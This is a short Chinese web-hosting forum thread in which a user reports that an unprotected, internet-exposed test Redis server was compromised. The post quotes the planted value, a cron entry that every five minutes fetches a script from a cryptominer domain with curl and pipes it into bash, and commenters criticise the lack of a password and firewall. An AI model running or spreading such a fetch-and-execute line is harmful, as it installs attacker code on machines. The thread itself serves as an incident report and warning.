全球主机交流论坛

标题: 测试redis被人扫了 (附脚本) [打印本页]
作者: 小白白    时间: 2019-1-25 14:36
标题: 测试redis被人扫了 (附脚本)
一台在容器里的测试redis,暴露了公网,没设置密码。


  1. 1.2.3.4:6379> get weaponX
  2. "\n*/5 * * * * curl -fsSL https://master.minerxmr.ru/run.jpg | bash\n"
复制代码




然后我解出来的脚本如下,给大家参考。  里面各种删除、卸载。呵呵

作者: 小白白    时间: 2019-1-25 14:37
本帖最后由 小白白 于 2019-1-25 14:42 编辑

哇 脚本解出来 字符太多  发布了帖。


----------------------------------------------------------------------------

https://coding.net/u/omg/p/AA/git/blob/master/a.sh
作者: 忘江湖    时间: 2019-1-25 14:47
这是大佬特意搞的蜜罐吗
作者: why?    时间: 2019-1-25 15:17
redis 不设密码 不设防火墙 不限内网 心大
作者: 小白白    时间: 2019-1-25 16:19
why? 发表于 2019-1-25 15:17
redis 不设密码 不设防火墙 不限内网 心大

为了图方便而已。 线上肯定不能这么搞



欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4